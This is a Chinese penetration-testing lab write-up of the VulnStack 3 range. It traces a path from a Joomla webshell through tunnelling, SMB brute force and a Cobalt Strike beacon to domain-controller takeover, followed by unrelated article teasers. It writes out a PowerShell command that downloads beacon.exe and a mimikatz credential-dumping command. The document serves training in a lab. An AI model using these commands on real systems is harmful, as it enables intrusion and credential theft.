红日ATT&CK VulnStack靶场(三)

网络拓扑

在这里插入图片描述

web阶段

1.扫描DMZ机器端口

在这里插入图片描述
2.进行ssh和3306爆破无果后访问web服务

在这里插入图片描述
3.已知目标是Joomla,扫描目录

在这里插入图片描述
4.有用的目录分别为1.php

在这里插入图片描述
5.configuration.php~中泄露了数据库密码

在这里插入图片描述
6.administrator为后台登录地址

在这里插入图片描述
7.直接连接mysql

在这里插入图片描述
8.找到管理员表,密码加密了

在这里插入图片描述
9.百度joomla密码的加密方式以及重置方式,用下面的方式添加新的管理员用户
https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn

在这里插入图片描述
10.重置密码后登录后台

在这里插入图片描述
11.搜索相关漏洞,用这个后台RCE

在这里插入图片描述在这里插入图片描述
12.访问后并没有回显

在这里插入图片描述
13.查看exp是怎么写的,看着没什么问题,不知道为什么不显示

在这里插入图片描述
14.修改一下直接写一个一句话马

在这里插入图片描述
15.修改一下直接写一个一句话马

在这里插入图片描述
16.连接上蚁剑,进入命令行发现不能执行

在这里插入图片描述
17.这里看网上说是被disable_function限制了,在之前的phpinfo的信息中也可以看到disable_function

disable_function就是在web服务中禁止执行一些高危函数,像一般的webshell管理工具就是默认用exec、system这种php函数来执行系统命令的,然而在此处就被disable_function限制了

在这里插入图片描述
18.使用蚁剑的插件进行绕过

在这里插入图片描述
19.成功执行命令

在这里插入图片描述

内网

1.这里看了一下ip,发现只有一个内网ip并没有公网ip,之前那个公网ip应该是一个负载均衡服务器使用了nginx反向代理

在这里插入图片描述
2.翻出来的账号密码

在这里插入图片描述

3.通过此账号密码登录公网服务器,也就是那台负载的ssh

在这里插入图片描述
4.上传fscan大致扫描一下内网

在这里插入图片描述
在这里插入图片描述
5.搭建frp做内网穿透
服务端
在这里插入图片描述客户端
在这里插入图片描述
6.因为之前fscan看到192.168.93.20开启了80端口,所以这里扫描一下

在这里插入图片描述
7.发现是一个sqlserver的什么登录框

在这里插入图片描述
8.尝试对sqlserver进行爆破但是无果

在这里插入图片描述
9.对SMB进行爆破,这里爆破成功

在这里插入图片描述
10.通过wmiexec进行连接

在这里插入图片描述
11.连接成功后查看一下大致的信息,判断是否可出网

在这里插入图片描述

12.连接成功后查看一下大致的信息,判断是否可出网

在这里插入图片描述
13.因为目标不可出网,所以这里打算使用cs的正向代理木马去控制目标主机

之前搭建了内网隧道,现在我本地的机器可以访问192.168.93这个网段,所以说要通过正向代理让192.168.93.20这个机器上线cs的话可以先让本地机器上线,或者也可以让192.168.93.100那台ubantu上线去正向连接192.168.93.20,因为cs生成linux的木马要用插件所以这里直接就让我本地的机器上线了,再通过隧道去正向连接192.168.93.20受害机器

在这里插入图片描述
14.创建正向监听

在这里插入图片描述

15.创建木马绑定这个正向监听器

在这里插入图片描述
在这里插入图片描述
16.将因为192.168.93.20这个机器不出网,所以把木马上传到192.168.93.100这台ubantu上,开启http服务

在这里插入图片描述在这里插入图片描述
17.这边192.168.93.20使用wmiexe创建的会话用过powershell去下载192.168.93.100上的木马

powershell (new-object Net.WebClient).DownloadFile('http://192.168.93.100:8888/beacon.exe','C:\beacon.exe')

在这里插入图片描述
18.下载成功后执行,进行监听

在这里插入图片描述

19.这里使用我本地机器会话的beacon去直接连接正向代理木马

在这里插入图片描述

20.机器192.168.93.20成功上线

在这里插入图片描述
21.这里想直接使用mimikatz抓取密码,但是不知道为什么执行出错了

在这里插入图片描述在这里插入图片描述
22.使用cs将本地的mimikatz上传到192.168.93.20这台机器上

在这里插入图片描述
23.运行mimikatz抓取本地密码并将结果保存

mimikazi.exe log privilege::debug sekurlsa::logonpasswords

在这里插入图片描述
在这里插入图片描述
24.对运行的结果进行下载

在这里插入图片描述
25.这里可以看到抓取到了WIN-8GA56TNV3MV这台机器的管理员用户密码

在这里插入图片描述

26.对比一下之前fscan扫描的结果,这台机器的ip是192.168.93.10,并且这台机器是域控

在这里插入图片描述

27.直接通过psexec明文密码去连接,成功获取到会话

在这里插入图片描述
28.继续在192.168.93.100启动web

在这里插入图片描述
29.这里我想让它和之前的机器一样直接正向连接上线cs,但是不知道为什么一直不成功

在这里插入图片描述
30.既然上线不了cs那就直接通过powershell下载mimikatz到本地吧

在这里插入图片描述
31.既然这台机器是域控,那肯定要抓krbtgt的hash

在这里插入图片描述
32.整个过程成功拿下了域控并抓了krbtgt的hash,此时还有一个192.168.93.30机器没有上线,接下来的话就是做黄金票据然后登录这台机器了,这里就不做演示了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/36910.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

提高学生学习效率的模拟考试系统

在如今竞争激烈的社会环境下,提高学生的学习效率显得尤为重要。为了帮助学生评估自己的学习水平并提供有针对性的学习建议,开发一款模拟考试系统是非常必要的。 一、学生信息录入 模拟考试系统首先需要学生信息录入功能。学生可以通过一个简单的表单填…

Unity游戏源码分享-中国象棋Unity5.6版本

Unity游戏源码分享-中国象棋Unity5.6版本 项目地址: https://download.csdn.net/download/Highning0007/88215699

【c语言】指针进阶(超详细)

文章目录 ✈ 指向函数指针数组的指针📌指向函数指针数组的指针的定义📌指向函数指针数组的数组指针的使用 ✈回调函数📌 回调函数的定义📌 回调函数的使用 ✈qsort函数📌 qsort函数的作用📌qsort函数的定义…

【佳佳怪文献分享】安全人机交互的学习责任分配与自动驾驶应用

标题:Learning Responsibility Allocations for Safe Human-Robot Interaction with Applications to Autonomous Driving 作者:Ryan K. Cosner, Yuxiao Chen, Karen Leung, and Marco Pavone 来源:2023 IEEE International Conference on …

【QT】 Word模板编辑、转PDF格式

很高兴在雪易的CSDN遇见你 ,给你糖糖 欢迎大家加入雪易社区-CSDN社区云 前言 本文分享基于QT进行Word模板编辑以及Word转PDF的技术,希望对各位小伙伴有所帮助! 感谢各位小伙伴的点赞+关注,小易会继续努力分享,一起进步! 你的点赞就是我的动力(^U^)ノ~YO 目录 …

机器学习-特征选择:如何使用递归特征消除算法自动筛选出最优特征?

一、引言 在实际应用中,特征选择作为机器学习和数据挖掘领域的重要环节,对于提高模型性能和减少计算开销具有关键影响。特征选择是从原始特征集中选择最相关和最具区分力的特征子集,以提高模型的泛化能力和可解释性。 特征选择在实践中具有以…

计算机竞赛 python opencv 深度学习 指纹识别算法实现

1 前言 🔥 优质竞赛项目系列,今天要分享的是 🚩 python opencv 深度学习 指纹识别算法实现 🥇学长这里给一个题目综合评分(每项满分5分) 难度系数:3分工作量:4分创新点:4分 该项目较为新颖…

代码质量检查工具SonarQube

Devops流水线之SonarQube 文章目录 Devops流水线之SonarQube1. 软件功能介绍及用途2. 软件环境搭建与使用2.1 使用方法2.2 SonarQube相关属性说明2.3 Sonar配置文件内容说明 3. 使用环节4. 检查方法 1. 软件功能介绍及用途 SonarQube是一个用于代码质量管理的开源平台&#xf…

Python Opencv实践 - 图像放射变换

import cv2 as cv import numpy as np import matplotlib.pyplot as pltimg cv.imread("../SampleImages/pomeranian.png", cv.IMREAD_COLOR) rows,cols img.shape[:2] print(img.shape[:2])#使用getAffineTransform来获得仿射变换的矩阵M #cv.getAffineTransform(…

Java:正则表达式案例:爬数据,重复数据替换,数据分割

使用正则表达式查找一段文本中的内容 需求:请把下面文本中的电话,邮箱,座机号码,热线都爬取出来。 String data "电话:1866668888,18699997777\n" "或者联系邮箱: boniuitcast.cn,\n" "座机…

16 dplsys GAN

和有监督的分类工作不同,生成任务的目标更不明确。难以评价生成结果的好坏。 Oracle discriminator 假设我们有一个先知判别器oracle discriminator可以分辨我们生成的内容是真还是假。 我们想让生产成的结果足够真实,所以要 fool Oracle discriminato…

Android布局【GridLayout】

文章目录 GridLayout概述常见属性子控件属性项目结构主要代码 GridLayout概述 GridLayout也名网格布局,该布局与TableLayout类似,但与其相比,GridLayout会更加的灵活,比如 TableLayout不能将两行进行一个合并,只能将两列进行一个…

【MySQL--->数据类型】

文章目录 [TOC](文章目录) 一、数据类型分类二、整型类型三、bit(位)类型四、float类型五、decimal类型六、char和varchar类型1.char类型2.varchar3.char与varchar的区别 七、日期与时间类型八、enum和set 一、数据类型分类 二、整型类型 数值类型有数据存储上限,而且每个类型都…

4、Rocketmq之存储原理

CommitLog ~ MappedFileQueue ~ MappedFile集合 正常情况下,RocketMQ支持消息体字节数最多为1个G。注意该消息体并不单单是消息体body。如果生产的消息其字节数超过1个G则该消息是无法被落盘处理的。因为没有一个MapperFile文件可以承载该消息所有的字节数。 1.All…

【力扣每日一题】617. 合并二叉树 dfs bfs 8.14打卡

文章目录 题目思路代码 题目 617. 合并二叉树 难度: 简单 描述: 给你两棵二叉树: root1 和 root2 。 想象一下,当你将其中一棵覆盖到另一棵之上时,两棵树上的一些节点将会重叠(而另一些不会&#xff0…

阿里云ACP知识点

前言:记录ACP错题 1、在创建阿里云ECS时,每台服务器必须要包含_______用来存储操作系统和核心配置。 系统盘(不是实例,实例是一个虚拟的计算环境,由CPU、内存、系统盘和运行的操作系统组成;ESC实例作为云…

【量化课程】08_1.机器学习量化策略基础实战

文章目录 1. 常用机器学习模型1.1 回归模型1.2 分类模型1.2.1 SVC介绍1.2.2 SVC在量化策略中的应用 2. 机器学习量化策略实现的基本步骤3. 策略实现 1. 常用机器学习模型 1.1 回归模型 线性回归多层感知器回归自适应提升树回归随机森林回归 1.2 分类模型 线性分类支持向量机…

Android布局【FrameLayout】

文章目录 常见属性说明项目结构主要代码 常见属性 android:foreground:设置前景android:foregroundGravity:设置前景位置 说明 FrameLayout的其他属性与前面学的差不多,只不过需要特别注意上面两个即可 项目结构 主要代码 activity_main…

计算机视觉中的特征检测和描述

一、说明 这篇文章是关于计算机视觉中特征检测和描述概念的简要理解。在其中,我们探讨了它们的定义、常用技术、简单的 python 实现和一些限制。 二、什么是特征检测和描述? 特征检测和描述是计算机视觉中的基本概念,在图像识别、对象跟踪和图…

Beats:使用 Filebeat 将 golang 应用程序记录到 Elasticsearch - 8.x

毫无疑问,日志记录是任何应用程序最重要的方面之一。 当事情出错时(而且确实会出错),我们需要知道发生了什么。 为了实现这一目标,我们可以设置 Filebeat 从我们的 golang 应用程序收集日志,然后将它们发送…